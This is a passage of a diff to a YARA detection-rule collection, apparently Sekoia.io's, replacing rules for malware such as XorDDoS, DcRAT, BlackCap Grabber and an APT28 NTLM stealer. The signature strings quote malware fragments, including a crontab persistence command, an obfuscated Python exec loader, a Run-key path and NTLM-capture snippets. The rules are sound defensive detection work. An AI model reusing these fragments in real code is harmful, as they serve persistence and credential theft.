-		$string1 = { 2f 62 69 6e 2f 73 68 00 2f 74 6d 70 2f 6c 6f 67 69 6e }
-		$string2 = { 2F 64 65 76 2F 6E 75 6C 6C [1-3] 2F 62 69 6E 2F 73 68 00 2D 63 }
+		$dec = { 55 8b ec 8b 4d ?? 83 ec 0c 56 57 e8 ?? ?? ?? ?? 6a 03 33 d2 8b f8 59 f7 f1 8b c7 85 d2 74 04 }
+		$str01 = "------" ascii
+		$str02 = "Network Info:" ascii
+		$str03 = "- IP: IP?" ascii
+		$str04 = "- Country: ISO?" ascii
+		$str05 = "- Display Resolution:" ascii
+		$str06 = "User Agents:" ascii
+		$str07 = "%s\\%s\\%s" ascii
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 180KB and ( ( @string2 - @string1 < 3400 ) )
+		uint16( 0 ) == 0x5A4D and ( $dec or 5 of ( $str* ) )
 }
-rule SEKOIA_Apt_Unk_Batcopier_Strings : FILE
+
+rule SEKOIA_Tool_Impersonate_Strings : FILE
 {
 	meta:
-		description = "Detects BatCopier variant"
+		description = "Detects Impersonate"
 		author = "Sekoia.io"
-		id = "eb76bbd0-a722-4fec-a4a7-c48c70a1880b"
-		date = "2024-09-06"
+		id = "2ab345a2-9366-4673-b398-a59ba6954af5"
+		date = "2024-07-24"
 		modified = "2024-12-19"
-		reference = "https://www.seqrite.com/blog/operation-oxidovy-sophisticated-malware-campaign-targets-czech-officials-using-nato-themed-decoys/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_unk_batcopier_strings.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0007d6d00d5b8db048456bb566ef9ed4516c4e1b392cc73c40396785ba885f55"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_impersonate_strings.yar#L3-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "63c46a2d97d0a8360351b8906665186c5ad2dcaa6f2edba6da7bf4de2ce00241"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249143,52 +249687,57 @@ rule SEKOIA_Apt_Unk_Batcopier_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "@echo off"
-		$ = "echo F|xcopy"
-		$ = "attrib +r +s +h"
+		$ = "[*] Listing available tokens"
+		$ = "[ID: %2d][SESSION: %d][INTEGRITY: %-6ws][%-18ws][%-22ws] User: %ws"
+		$ = "[*] Impersonating %ws"
+		$ = "[!] Impersonation failed error: %d"
+		$ = "[*] Adding user %ls on %ls"
+		$ = "[!] Add user failed with error: %d"
+		$ = "[*] Adding user %ws to domain group %ws"
+		$ = "[!] Add user in domain %ws failed with error: %d"
+		$ = "[!] Couldn't change token session id (error: %d)"
 
 	condition:
-		all of them and filesize < 1KB
+		uint16be( 0 ) == 0x4d5a and 3 of them or pe.imphash ( ) == "e14ce763114276674e22b7b8b637bd4b"
 }
-rule SEKOIA_Bot_Lin_Xorddos_Strings : FILE
+rule SEKOIA_Downloader_Win_Donot
 {
 	meta:
-		description = "Catch XORDDoS strings"
+		description = "Detect the DoNot's downloader malware. There are big binaries in downloader strings."
 		author = "Sekoia.io"
-		id = "2f5c70a3-fe3f-4091-905d-d779bd0cb2cd"
-		date = "2023-11-02"
+		id = "31b153cc-a4b9-40a0-8bcb-ce1370645b4b"
+		date = "2023-03-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/bot_lin_xorddos_strings.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b91cfeeaddffe98ac1649c5d88a2091cf7ab8ff65b232f09c323d23684cb2a2d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/downloader_win_donot.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f6a03e6cfda74c1fbb1e8939a66735498d604a821b8b51492c2c5c6a46a38b6e"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)" ascii fullword
-		$s2 = "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab" ascii fullword
-		$s3 = "for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done"
+		$ = "001100000011000100110001001100000011000000110000001100010011000100110000001100010011000100110000001100010011000100110000001100010011"
+		$ = "01010011011011110110011001110100011101110110000101110010011001010101110001001101011010010110001101110010011011110111001101101111011001100111010001011100010101110110100101101110011001000110111101110111011100110101110001000011011101010111001001110010011001010110111001110100010101100110010101110010011100110110100101101111011011100101110001010101011011100110100101101110011100110111010001100001011011000110110000000000"
+		$ = "0101110001110011011110010111001101110100011001010110110100110011001100100101110001110010011101010110111001100100011011000110110000110011001100100010111001100101011110000110010100000000"
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize > 600KB and filesize < 700KB and 3 of them
+		1 of them
 }
-
-rule SEKOIA_Plugx_Final_Payload : FILE
+rule SEKOIA_Infostealer_Win_Blackcap : FILE
 {
 	meta:
-		description = "Detects encrypted plugx config with a specific size"
+		description = "Finds BlackCap Grabber samples (Python code obfuscated using Py-Fuscate)"
 		author = "Sekoia.io"
-		id = "a4047324-81a7-4c17-be84-c0fa479d2f89"
-		date = "2023-07-04"
+		id = "1aa1fadb-3413-46e2-b733-1ad2134f7be2"
+		date = "2023-03-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/plugx_final_payload.yar#L3-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "bf5035eb7ed620edcf7a0e8e8be220451ce268fc49310f28059b60576d8c5182"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_blackcap.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b826c88d557ea0a516534946ad9531eda1a875cb9c4ddf92d9b98f8c7b86623e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249196,46 +249745,61 @@ rule SEKOIA_Plugx_Final_Payload : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = {30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 88 13 00 00 60 ea 00 00 ?? ?? ?? ?? 00 00 00 00}
+		$imp01 = "import asyncio, json, ntpath, random, re, shutil, sqlite3, subprocess, threading, winreg, zipfile, httpx, psutil, win32gui, win32con, pyperclip, base64, requests, ctypes, time" ascii
+		$imp02 = "from ctypes import windll, wintypes, byref, cdll, Structure, POINTER, c_char, c_buffer;from Crypto.Cipher import AES;from PIL import ImageGrab;from win32crypt import CryptUnprotectData" ascii
+		$pyf01 = "import marshal,lzma,gzip,bz2,binascii,zlib;exec(marshal.loads(binascii.a2b_base64(b'YwAAAAAA" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and for any i in ( 0 .. pe.number_of_sections -1 ) : ( pe.sections [ i ] . name == ".data" and $s1 in ( pe.sections [ i ] . raw_data_offset..pe.sections [ i ] . raw_data_offset + pe.sections [ i ] . raw_data_size ) )
+		($imp01 in ( 0 .. 500 ) and $pyf01 in ( @imp01 + 200 .. @imp01 + 1000 ) or $imp02 in ( 0 .. 1000 ) and $pyf01 in ( @imp02 + 100 .. @imp02 + 500 ) ) and filesize > 100KB and filesize < 500KB
 }
-
-rule SEKOIA_Loader_Win_Doppeldridex
+rule SEKOIA_Rat_Win_Dcrat_Qwqdanchun : FILE
 {
 	meta:
-		description = "Detect the DoppelDridex banking trojan using its Rich header"
+		description = "Find DcRAT samples (qwqdanchun) based on specific strings"
 		author = "Sekoia.io"
-		id = "ee5111ae-ba0b-4cd3-abe6-c66324d16840"
-		date = "2021-09-28"
+		id = "8206a410-48b3-425f-9dcb-7a528673a37a"
+		date = "2023-01-26"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_doppeldridex.yar#L3-L33"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "4ceed302cb36b73d98070996ede64742579a261ef3ede6e1eb1723ddca32e839"
+		reference = "https://github.com/qwqdanchun/DcRat"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_win_dcrat_qwqdanchun.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "e6f8664e57ecce3bd7b2af5c67d564d526b32d12218b772b0e9f53709044e14d"
 		score = 75
 		quality = 80
-		tags = ""
-		version = "1.1"
+		tags = "FILE"
+		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$str01 = "DcRatByqwqdanchun" wide
+		$str02 = "U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==" wide
+		$str03 = "Po_ng" wide
+		$str04 = "Pac_ket" wide
+		$str05 = "Perfor_mance" wide
+		$str06 = "Install_ed" wide
+		$str07 = "get_IsConnected" ascii
+		$str08 = "get_ActivatePo_ng" ascii
+		$str09 = "isVM_by_wim_temper" ascii
+		$str10 = "save_Plugin" wide
+		$str11 = "timeout 3 > NUL" wide
+		$str12 = "ProcessHacker.exe" wide
+		$str13 = "Select * from Win32_CacheMemory" wide
+
 	condition:
-		pe.rich_signature.toolid( 122 , 50727 ) and pe.rich_signature.toolid ( 1 , 0 ) and pe.rich_signature.toolid ( 222 , 40629 ) and pe.rich_signature.toolid ( 131 , 30729 ) and pe.rich_signature.toolid ( 220 , 31101 ) and pe.rich_signature.toolid ( 202 , 60315 ) and pe.rich_signature.toolid ( 202 , 50727 ) and pe.rich_signature.toolid ( 261 , 23506 ) and pe.rich_signature.toolid ( 149 , 21022 ) and pe.rich_signature.toolid ( 261 , 23918 ) and pe.rich_signature.toolid ( 219 , 21005 ) and pe.rich_signature.toolid ( 171 , 30319 ) and pe.rich_signature.toolid ( 225 , 21005 ) and pe.rich_signature.toolid ( 221 , 21005 ) and pe.rich_signature.toolid ( 259 , 24210 ) and pe.rich_signature.toolid ( 258 , 24213 ) and pe.rich_signature.toolid ( 158 , 40219 ) and pe.rich_signature.toolid ( 145 , 21022 ) and pe.rich_signature.toolid ( 207 , 60315 ) and pe.rich_signature.toolid ( 256 , 23026 )
+		uint16( 0 ) == 0x5A4D and 8 of them
 }
-
-rule SEKOIA_Implant_Win_Lyceum : FILE
+rule SEKOIA_Apt_Apt28_Powershell_Ntlm_Stealer : FILE
 {
 	meta:
-		description = "Detect the DnsSystem malware used by Lyceum in March 2022"
+		description = "Detects the NTLM Stealer used by APT28 against UA energy sector"
 		author = "Sekoia.io"
-		id = "e061562f-9c17-4ef4-b7f9-2c6708bb6570"
-		date = "2022-06-13"
+		id = "3fb5c472-6b1c-490e-b38f-4d4f1c472f43"
+		date = "2023-09-07"
 		modified = "2024-12-19"
-		reference = "https://www.zscaler.com/blogs/security-research/lyceum-net-dns-backdoor"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_win_lyceum.yar#L4-L30"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f6b4acf48877c1dd62fd2bfa19d701b0a79f052ec44fc5d4fe3dc7b02aa689c8"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt28_powershell_ntlm_stealer.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "29d039bf7d7018ebbae187ae0f057161c3f9256076324f06167872adc0accfa7"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249243,25 +249807,27 @@ rule SEKOIA_Implant_Win_Lyceum : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$02c7afab-7f96-4dfa-b452-832e3624e270" ascii
-		$ = "C:\\Users\\u1\\Downloads\\Compressed\\article_src\\DnsDig\\DnsDig\\obj\\Release\\DnsDig.pdb" ascii
+		$ = "'NTLM ' = [Convert]::ToBase64String"
+		$ = ".Prefixes.Add('http://localhost:8080/')"
+		$ = ".AddHeader('WWW-Authenticate', 'NTLM')"
+		$ = "GetValues('Authorization');"
+		$ = "[0] -split '\\s+';"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of them or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "d0e0c140e4831f835bcdcc6b463f3acc" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "22c92a1ba6ffd828637d7045261db7a45608ddd6d7c85836af011b3c679c725f" )
+		3 of them and filesize < 4000
 }
-
-rule SEKOIA_Apt_Mustang_Panda_Toneshell : FILE
+rule SEKOIA_Apt_Unk_Hrserv_Webshell_Strings : FILE
 {
 	meta:
-		description = "Detect the TONESHELL implant used by Mustang Panda from specific functions"
+		description = "Detects HrServ web shell based on strings"
 		author = "Sekoia.io"
-		id = "bf7c68a9-dddc-494a-a603-c2311ed712a4"
-		date = "2022-11-28"
+		id = "684fd41c-9ea6-4f4e-8db4-82325a2ff80b"
+		date = "2023-11-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_mustang_panda_toneshell.yar#L4-L160"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "192fb01817cc6361062999cf539c51616d1755a5cd8e9d6e37bee6f6d04b0721"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_unk_hrserv_webshell_strings.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b5650e08227bbdb82c635bd67abae57e3107be9126639619809bfbe2a7ffee89"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249269,122 +249835,29 @@ rule SEKOIA_Apt_Mustang_Panda_Toneshell : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$func1 = {
-        55
-        89 E5
-        64 A1 18 00 00 00
-        A3 ?? ?? ?? ??
-        5D
-        C3
-        }
-		$func2 = {
-        55
-        89 E5
-        50
-        8B 45 ??
-        8B 45 ??
-        8B 45 ??
-        8B 45 ??
-        89 45 ??
-        8B 45 ??
-        89 C1
-        83 C1 FF
-        89 4D ??
-        83 F8 00
-        0F 84 ?? ?? ?? ??
-        8B 45 ??
-        8A 08
-        8B 45 ??
-        88 08
-        8B 45 ??
-        83 C0 01
-        89 45 ??
-        8B 45 ??
-        83 C0 01
-        89 45 ??
-        E9 ?? ?? ?? ??
-        8B 45 ??
-        83 C4 04
-        5D
-        C3
-        }
-		$decryption_routine1 = {
-        8B 45 ??
-        C7 45 ?? 00 00 00 00
-        83 7D ?? 20
-        0F 8D ?? ?? ?? ??
-        8B 45 ??
-        8B 4D ??
-        0F BE 04 08
-        83 F0 ??
-        88 C2
-        8B 45 ??
-        8B 4D ??
-        88 14 08
-        8B 45 ??
-        83 C0 01
-        89 45 ??
-        E9 ?? ?? ?? ??
-        83 C4 04
-        }
-		$decryption_routine2 = {
-        55
-        89 E5
-        83 EC 08
-        8B 45 ??
-        8B 45 ??
-        8B 45 ??
-        8B 45 ??
-        C7 45 ?? 00 00 00 00
-        C7 45 ?? 00 00 00 00
-        8B 45 ??
-        3B 45 ??
-        0F 8D ?? ?? ?? ??
-        8B 45 ??
-        8B 4D ??
-        0F BE 04 08
-        8B 4D ??
-        8B 55 ??
-        0F BE 0C 11
-        31 C8
-        88 C2
-        8B 45 ??
-        8B 4D ??
-        88 14 08
-        8B 45 ??
-        8B 4D ??
-        83 E9 01
-        39 C8
-        0F 85 ?? ?? ?? ??
-        C7 45 ?? 00 00 00 00
-        E9 ?? ?? ?? ??
-        8B 45 ??
-        83 C0 01
-        89 45 ??
-        8B 45 ??
-        83 C0 01
-        89 45 ??
-        E9 ?? ?? ?? ??
-        83 C4 08
-        5D
-        C3
-        }
+		$ = "open file error!"
+		$ = "create file error!"
+		$ = "[!] CreatePipe failed."
+		$ = "[!] CreateProcess failed."
+		$ = "[!] CreateProcess success,no result return."
+		$ = "; cadataIV="
+		$ = "cadataKey="
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 8MB and for all i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) != "69f400d3ff4679294e63fb8a8ca97dbb" ) and 3 of them and true
+		uint16be( 0 ) == 0x4d5a and filesize < 300KB and 5 of them
 }
-rule SEKOIA_Exploit_Ez_Pwnkit_Strings : FILE
+rule SEKOIA_Apt_Gamaredon_Stealer_Obfuscation_1 : FILE
 {
 	meta:
-		description = "Detects ez-pwnkit exploit"
+		description = "Matches the Gamaredon Stealer obfuscation"
 		author = "Sekoia.io"
-		id = "24301f35-8174-4e0d-b14a-fc7e45a29b26"
-		date = "2024-01-22"
+		id = "a6197d16-8ed1-410b-8814-d7eff9a8096c"
+		date = "2022-02-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/exploit_ez_pwnkit_strings.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "36ec579f6c2dfeaf4ae6f6559d565d418a1f31199102eaa390ca36493f5b18cd"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gamaredon_stealer_obfuscation_1.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "7f6a5f8af73c4eb7debbadfd22232ad4e3f44e3aae36c3d624ce7a1a050e8782"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249392,50 +249865,51 @@ rule SEKOIA_Exploit_Ez_Pwnkit_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "go.buildid"
-		$s2 = "github.com/OXDBXKXO/ez-pwnkit"
+		$s1 = { 76 61 72 20 [5-30] 3d 20 6e 65 77 20 6f 62 6a 65 63 74 5b 5d 20 7b 20 [2-10] 2c 20 [2-10] 2c 20 [2-10] 2c 20 [2-10] 2c 20 [2-10] 2c 20 [2-10] 20 7d 3b }
+		$s2 = { 66 6f 72 28 69 6e 74 20 [5-30] 20 3d 20 30 3b 20 [5-30] 20 3c 20 31 30 3b 20 [5-30] 2b 2b 29 }
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 5MB and $s1 and #s2 > 5
+		uint16be( 0 ) == 0x4d5a and filesize > 100MB and ( #s1 > 100 or #s2 > 100 )
 }
-rule SEKOIA_Apt_Blackwood_Nspx30_Plugin : FILE
+rule SEKOIA_Hacktool_Ligolo_Relay_Strings : FILE
 {
 	meta:
-		description = "Detects plugins of NSPX30 backdoor based on RTTI and rundll32 string"
+		description = "Detects Ligolo Relay based on strings"
 		author = "Sekoia.io"
-		id = "ef8e0d51-c78c-426b-8008-910e27546f23"
-		date = "2024-01-29"
+		id = "1e32f2e5-b66b-4b55-9dd4-1402b2f627ed"
+		date = "2022-02-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_blackwood_nspx30_plugin.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "cf7c232a5a817ff5c0da04744abf99ed2fcea587e3e6f6e8bf3aef7ca8f2b51b"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_ligolo_relay_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "57150b394cc7af9ae786b63d83acc29529fa037f0a52afde0e12a2eef93bf6c8"
 		score = 75
-		quality = 76
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = {2E 3F 41 56 43 43 61 62 69 6E 65 74 40 40}
-		$s2 = {2E 3F 41 56 43 45 6E 63 6F 64 65 72 40 40}
-		$s3 = "rundll32.exe \"%hs\",#1" wide
+		$ = "ligolo/cmd/localrelay"
+		$ = "main.LigoloRelay.Start"
+		$ = "main.LigoloRelay.startRelayHandler"
+		$ = "main.LigoloRelay.startLocalHandler"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize > 2MB and filesize < 5MB and 3 of them
 }
-rule SEKOIA_Infostealer_Win_Stormkitty_Exfil_Urls : FILE
+rule SEKOIA_Loader_Win_Squirrelwaffle : FILE
 {
 	meta:
-		description = "Detect the open-source StormKitty spyware by looking for the github path"
+		description = "Detect the Squirrelwaffle DLL"
 		author = "Sekoia.io"
-		id = "d3b6e778-85da-4ab6-bc98-921897677485"
-		date = "2022-04-20"
+		id = "bea3125e-6e84-435f-855b-fd3239a0deac"
+		date = "2021-09-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_stormkitty_exfil_urls.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ccf0efe9ccba8e37bc19fa241e2d7698b1a798a3e8026b1b6930452b8a8ba9b4"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_squirrelwaffle.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ab1a95f09564d0417d5c06c578d4dc8d790ec09bc67716d8c9e5207262a0594d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249443,237 +249917,240 @@ rule SEKOIA_Infostealer_Win_Stormkitty_Exfil_Urls : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "https://github.com/LimerBoy/StormKitty" ascii
-		$telegram = "https://api.telegram.org" wide
-		$discord = "https://cdn.discordapp.com" wide
+		$s1 = "AEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" ascii
+		$s2 = "c:\\equal\\True\\bird_Select\\780\\true.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and ( #telegram > 3 or #discord > 3 )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Backdoor_Win_Warhawk
+rule SEKOIA_Apt_Susp_Lazarus_Dangerous_Password : FILE
 {
 	meta:
-		description = "Detect the WarHawk backdoor used by the SideWinder intrusion-set"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "d0ec19a7-cb08-4bca-b153-d7b0358186b4"
-		date = "2022-10-24"
+		id = "726c8b92-7fbe-40f8-917a-cabd206028da"
+		date = "2023-09-12"
 		modified = "2024-12-19"
-		reference = "https://www.zscaler.com/blogs/security-research/warhawk-new-backdoor-arsenal-sidewinder-apt-group-0"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_win_warhawk.yar#L1-L56"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "09cd60f91c54da6ca051550c89629d11a55a89d5b0d5f6d5696232b4edfdd491"
-		score = 75
-		quality = 58
-		tags = ""
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_susp_lazarus_dangerous_password.yar#L1-L15"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "2b159266bd6bba20ffaa627dac840840eaaad98e7962f48bbae428e687155b3d"
+		score = 65
+		quality = 80
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash_exe1 = "7d3574c62df44b74337fc74ec7877792b4ffa1486a49bb19668433c3ca8836b5"
-		hash_exe2 = "624c6b56ee3865f4a5792ad1946a8e86b876440a5af3bac22ac1dee92f1b7372"
-		hash_iso1 = "58b3686e4255d32dbcf7dee9dac1d5be6d4692d086cde167da1e1a5e0e1b315a"
-		hash_iso2 = "f97d5d3e1c2ceb3e9d23ae5b5d4e7c9857155df5acf7f67fee995cb041c797dc"
 
 	strings:
-		$ = {7b205c226e616d655c223a205c2225735c222c205c2273697a655c223a205c225c222c205c226d6f645c223a205c2225735c222c205c22747970655c223a205c2246696c6520666f6c6465725c22207d2c}
-		$ = {7b20225f68776964223a20222573222c20225f636f6d7075746572223a20222573222c20225f757365726e616d65223a20222573222c20225f6f73223a2022257322207d}
-		$ = {7b5c226e616d655c223a205c2225735c222c205c22747970655c223a205c2225735c227d2c}
-		$ = {7b20225f68776964223a20222573222c20225f66696c656d67725f646f6e65223a202274727565222c20225f726573706f6e7365223a2022257322207d}
-		$ = {7b20225f68776964223a20222573222c20225f7461736b223a20227472756522207d}
-		$ = {7b20225f68776964223a20222573222c20225f7461736b5f646f6e65223a202274727565222c20225f6964223a2022257322207d}
-		$ = {7b20225f68776964223a20222573222c20225f636d64223a20227472756522207d}
-		$ = {7b20225f68776964223a20222573222c20225f636d645f646f6e65223a202274727565222c20225f726573706f6e7365223a2022257322207d}
-		$ = {7b20225f68776964223a20222573222c20225f66696c656d6772223a20227472756522207d}
-		$ = {7b20225f68776964223a2022257322207d}
-		$ = {7b20225f68776964223a20222573222c20225f70696e67223a20227472756522207d}
-		$ = "cmd.exe"
+		$ = ".jpeg" wide
+		$ = "mshta"
 
 	condition:
-		all of them
+		uint32be( 0 ) == 0x4c000000 and all of them and filesize < 5KB
 }
-rule SEKOIA_Apt_Backdoordiplomaty_Phantomnet : FILE
+
+rule SEKOIA_Infostealer_Win_Mars_Stealer : FILE
 {
 	meta:
-		description = "Detects PhantomNet based on strings"
+		description = "Detect Mars Stealer based on specific strings"
 		author = "Sekoia.io"
-		id = "bbcc0664-ef2b-47db-a546-b5e0aa2a1e9a"
-		date = "2024-06-06"
+		id = "3e2c7440b2fc9e4b039e6fa8152ac8fd"
+		date = "2022-02-03"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_backdoordiplomaty_phantomnet.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "e4be9b9e092dcaa368650b7f696ca532f89752bdbe6b5fd09b4285a643c20b86"
+		reference = "https://3xp0rt.com/posts/mars-stealer"
